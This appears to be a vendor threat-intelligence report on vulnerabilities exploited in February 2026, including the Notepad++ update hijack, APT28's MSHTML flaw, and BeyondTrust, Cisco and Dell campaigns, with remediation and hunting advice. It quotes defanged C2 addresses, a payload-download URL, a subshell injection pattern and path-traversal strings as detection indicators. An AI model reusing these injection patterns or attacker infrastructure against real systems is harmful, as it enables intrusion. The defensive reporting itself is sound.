February 2026 saw a 43% decrease in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 13 vulnerabilities requiring immediate remediation, down from 23 in January 2026. All 13 carried a Very Critical Recorded Future Risk Score.

What security teams need to know:

• Microsoft dominates: Six of 13 vulnerabilities affected Microsoft products, accounting for 46% of February's findings; all were added to CISA's KEV catalog on the same day
• Supply-chain attack on Notepad++: Lotus Blossom, a suspected China state-sponsored threat actor, exploited CVE-2025-15556 to hijack Notepad++'s update channel and deliver a Cobalt Strike Beacon and the Chrysalis backdoor
• APT28 exploits MSHTML flaw: The Russian state-sponsored group leveraged CVE-2026-21513 via malicious Windows Shortcut files for multi-stage payload delivery
• Public exploits available: Four of 13 vulnerabilities have publicly available proof-of-concept code; an alleged exploit for a fifth is being advertised for sale

Bottom line: Despite a 43% drop in volume, February's vulnerabilities include named threat actor exploitation and five RCE-enabling flaws, making prioritized, intelligence-driven remediation as important as ever.

Quick Reference: February 2026 Vulnerability Table

All 13 vulnerabilities below were actively exploited in February 2026.

Table 1: List of vulnerabilities that were actively exploited in February based on Recorded Future data. *An alleged exploit for CVE-2026-21533 is being advertised for sale across Github. Recorded Future Triage was used to browse the website advertising the exploit, which can be viewed here via the Replay Monitor. (Source: Recorded Future)

Key Trends: February 2026

Vendors Most Affected

• Microsoft led with six vulnerabilities across Windows, Windows Server, Office, and Microsoft 365 products
• BeyondTrust faced a critical OS command injection flaw in Remote Support (RS) versions 25.3.1 and earlier, and Privileged Remote Access (PRA) versions 24.3.4 and earlier
• Cisco saw active exploitation of an authentication bypass in Catalyst SD-WAN infrastructure
• Additional affected vendors: Notepad++, Apple, Soliton Systems K.K., Google, and Dell

Most Common Weakness Types

• CWE-78 – OS Command Injection (tied for most common)
• CWE-693 – Protection Mechanism Failure (tied for most common)
• CWE-476 – NULL Pointer Dereference
• CWE-843 – Type Confusion
• CWE-807 – Reliance on Untrusted Inputs in a Security Decision

Exploitation Activity

Vulnerabilities associated with malware campaigns:

• Lotus Blossom (suspected China state-sponsored) exploited CVE-2025-15556 to hijack Notepad++ update traffic between June and December 2025. The campaign rotated C2 servers across three attack chains to deliver a Metasploit loader, Cobalt Strike Beacon, and a custom backdoor called Chrysalis.
• APT28 (Russian state-sponsored) exploited CVE-2026-21513 using malicious Windows Shortcut (.lnk) files with embedded HTML payloads for multi-stage payload delivery, with observed network communication to infrastructure associated with the threat group.
• UNC6201 (suspected China-nexus) exploited CVE-2026-22769 to compromise Dell RecoverPoint for VMs appliances, deploying the SLAYSTYLE web shell, BRICKSTORM backdoor, and GRIMBOLT, a C#-based backdoor with native AOT compilation to complicate detection.

Long-running exploitation activity:

• UAT-8616 exploited CVE-2026-20127, chaining it with CVE-2022-20775 to achieve root-level access on Cisco Catalyst SD-WAN systems, with Cisco Talos attributing the activity to a sophisticated threat actor and assessing that the activity dates back to at least 2023.

Priority Alert: Active Exploitation

These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.

CVE-2025-15556 | Notepad++

Risk Score: 99 (Very Critical) | CISA KEV: Added February 12, 2026

Why this matters: Lotus Blossom exploited this flaw to replace legitimate Notepad++ update packages with malicious installers, deploying Cobalt Strike and the Chrysalis backdoor to targeted users over a six-month period. The vulnerability affects the WinGUp updater used by Notepad++ versions prior to 8.8.9, which fails to cryptographically verify downloaded update metadata and installers.

Affected versions: Notepad++ versions prior to 8.8.9 (version 8.9.1 recommended)

Immediate actions:

• Update to Notepad++ version 8.9.1, released January 26, 2026
• Hunt for the malicious update.exe sample (SHA256: 4d4aec6120290e21778c1b14c94aa6ebff3b0816fb6798495dc2eae165db4566) in your environment
• Monitor for GUP.exe spawning unexpected child processes
• Review network connections for traffic to 45[.]76[.]155[.]202, 45[.]77[.]31[.]210, 45[.]32[.]144[.]255, or 95[.]179[.]213[.]0
• Check for directories named ProShow under %APPDATA% or unexpected files in %APPDATA%\Adobe\Scripts\
• Block or alert on curl.exe uploading files to temp[.]sh

Known C2 infrastructure: 45[.]76[.]155[.]202, 45[.]77[.]31[.]210, cdncheck[.]it[.]com, safe-dns[.]it[.]com, 95[.]179[.]213[.]0

Detection resources: Insikt Group created Sigma rules to detect update.exe's execution of reconnaissance commands (whoami, tasklist, systeminfo, and netstat -ano) and curl commands for system information exfiltration, available to Recorded Future customers.

CVE-2026-1731 | BeyondTrust Remote Support and Privileged Remote Access

Risk Score: 99 (Very Critical) | CISA KEV: Added February 13, 2026

Why this matters: Unauthenticated attackers can execute arbitrary OS commands over a WebSocket connection, enabling remote shell access and full system compromise, with no credentials required.

Affected versions: BeyondTrust Remote Support (RS) versions 25.3.1 and earlier; Privileged Remote Access (PRA) versions 24.3.4 and earlier

Immediate actions:

• Upgrade to BeyondTrust RS version 25.3.2 or later and PRA version 25.1 or later
• Monitor WebSocket connections to the /nw endpoint for crafted version strings containing subshell syntax (e.g., a[$(command)]0)
• Review logs for unexpected OS command execution originating from wsusservice or web service processes
• Restrict network access to BeyondTrust appliances to authorized management systems only

CVE-2026-20127 | Cisco Catalyst SD-WAN Controller and Manager

Risk Score: 99 (Very Critical) | CISA KEV: Added February 25, 2026

Why this matters: UAT-8616 exploited this authentication bypass to gain high-privileged access to Cisco SD-WAN infrastructure, chaining it with CVE-2022-20775 to achieve root-level access and maintain persistent, covert footholds. CISA issued Emergency Directive 26-03, requiring federal civilian agencies to immediately remediate.

Affected products: Cisco Catalyst SD-WAN Controller (formerly vSmart) and Cisco Catalyst SD-WAN Manager (formerly vManage) in on-premises deployments and SD-WAN Cloud installations

Immediate actions:

• Update to patched release versions 20.9.8.2, 20.12.6.1, 20.12.5.3, 20.15.4.2, or 20.18.2.1
• Monitor SD-WAN logs for unexpected control-connection-state-change new-state:up events and unrecognized peer-system-ip values
• Audit SSH authorized_keys files at /home/root/.ssh/authorized_keys and /home/vmanage-admin/.ssh/authorized_keys/ for unauthorized entries
• Check /etc/ssh/sshd_config for PermitRootLogin yes
• Review logs for path traversal strings related to CVE-2022-20775, such as /../../ and /\n&../\n&../
• Hunt for cleared or truncated logs from syslog, wtmp, lastlog, cli-history, bash_history, and files in /var/log/, which may indicate log clearing

Technical Deep Dive: Exploitation Analysis

Notepad++ Supply-Chain Attack (CVE-2025-15556)

Three-chain attack evolution: Lotus Blossom ran three distinct attack chains between July and October 2025, each evolving to evade detection:

• Chain 1 (July–August 2025): Replaced the legitimate Notepad++ update package with a malicious NSIS installer (update.exe) that abused a legitimate ProShow.exe file to launch an exploit payload containing shellcode. The shellcode decrypted and launched a Metasploit downloader, which retrieved a Cobalt Strike Beacon shellcode from hxxps://45[.]77[.]31[.]210/users/admin and executed it.
• Chain 2 (September 2025): Reused the same update channel with a modified update.exe that dropped legitimate Lua interpreter files alongside a malicious alien.ini script. The compiled Lua script allocated and executed shellcode via the EnumWindowStationsW API, ultimately delivering Cobalt Strike Beacon. Threat actors later split reconnaissance commands into multiple steps to evade detection logic tied to combined command-line patterns.
• Chain 3 (October 2025): Shifted to a new distribution server and delivered a malicious update.exe file that dropped a legitimate Bitdefender Submission Wizard renamed as BluetoothService.exe, a malicious DLL named log.dll, and an encrypted shellcode file. Update.exe executed BluetoothService.exe, which sideloaded log.dll. Log.dll then decrypted the shellcode and injected it into the BluetoothService.exe process.

Why this matters: The sustained, multi-month nature of this exploitation activity, with iterative evasion improvements across three attack chains, reflects the hallmarks of a disciplined, state-sponsored operation. Organizations that rely on Notepad++ in managed environments should treat any network activity initiated by GUP.exe as suspect.

APT28 MSHTML Exploitation (CVE-2026-21513)

Browser trust boundary abuse: The vulnerability resides in ieframe.dll hyperlink navigation logic, where insufficient URL validation in _AttemptShellExecuteForHlinkNavigate() allows threat actor-controlled input to invoke ShellExecuteExW outside the intended browser security context.

Akamai identified a malicious .lnk file (document.doc.LnK) associated with APT28 infrastructure. The exploit uses nested iframes and multiple DOM contexts to manipulate browser trust boundaries, bypassing both Mark of the Web (MotW) and Internet Explorer Enhanced Security Configuration (IE ESC) before triggering the vulnerable navigation flow. The .lnk initiates network communication with wellnesscaremed[.]com as part of APT28's multistage payload delivery.

SHA256 for document.doc.LnK.download: aefd15e3c395edd16ede7685c6e97ca0350a702ee7c8585274b457166e86b1fa

Why this matters: APT28's use of a weaponized .lnk file exploiting a patched MSHTML flaw underscores the group's continued targeting of Windows environments and its willingness to operationalize browser-based vulnerabilities for initial access.

UNC6201 Dell RecoverPoint Campaign (CVE-2026-22769)

Persistence through VMware infrastructure: UNC6201 exploited hard-coded credentials stored in /home/kos/tomcat9/tomcat-users.xml to authenticate to the Apache Tomcat Manager and upload a malicious WAR file, deploying the SLAYSTYLE web shell and enabling RCE with root privileges.

After establishing access, UNC6201 deployed the BRICKSTORM backdoor for C2, then replaced it with GRIMBOLT in September 2025. GRIMBOLT uses native ahead-of-time (AOT) compilation to convert to machine-native code, removing common intermediate language metadata and complicating static analysis. UNC6201 then pivoted into VMware virtual infrastructure, creating temporary "Ghost NIC" network ports on ESXi-hosted VMs for stealthy lateral movement and implementing Single Packet Authorization (SPA) via iptables commands to gate access to their backdoor infrastructure.

Why this matters: The progression from web shell to persistent backdoors, and then the pivot to VMware infrastructure to support lateral movement demonstrates a mature, multi-stage intrusion methodology. Organizations running Dell RecoverPoint for VMs should assume default credentials have been compromised and hunt for SLAYSTYLE and GRIMBOLT indicators immediately.

Detection & Remediation Resources

Detection Artifacts from Insikt Group®

Recorded Future customers can access the following from Insikt Group®:

• CVE-2025-15556 – Sigma rules to detect reconnaissance commands (whoami, tasklist, systeminfo, netstat -ano) and curl-based exfiltration associated with the Notepad++ supply-chain attack
• CVE-2026-23760 (SmarterTools SmarterMail) – Nuclei template for authentication bypass detection, created in February (previously highlighted in January 2026 CVE Monthly)

Note: All detection artifacts are intended for use in authorized environments only.

Recorded Future Product Integrations

• Vulnerability Intelligence – Prioritize vulnerabilities based on real-world exploitation data, not just severity scores
• Attack Surface Intelligence – Identify exposed BeyondTrust, Cisco SD-WAN, and Dell RecoverPoint assets in your environment
• Third-Party Intelligence – Monitor vendor vulnerability exposure across your supply chain

Take Action

Ready to see how Recorded Future can help your team detect active exploitation, prioritize patching, and reduce attack surface risk? Explore our demo center to see these capabilities in action, or dive deeper into Insikt Group research for more threat intelligence insights.

About Insikt Group®:

Recorded Future's Insikt Group® threat research team is comprised of analysts, linguists, and security researchers with deep government and industry experience. Insikt Group® publishes threat intelligence to the Recorded Future analyst community in blog posts and analyst notes.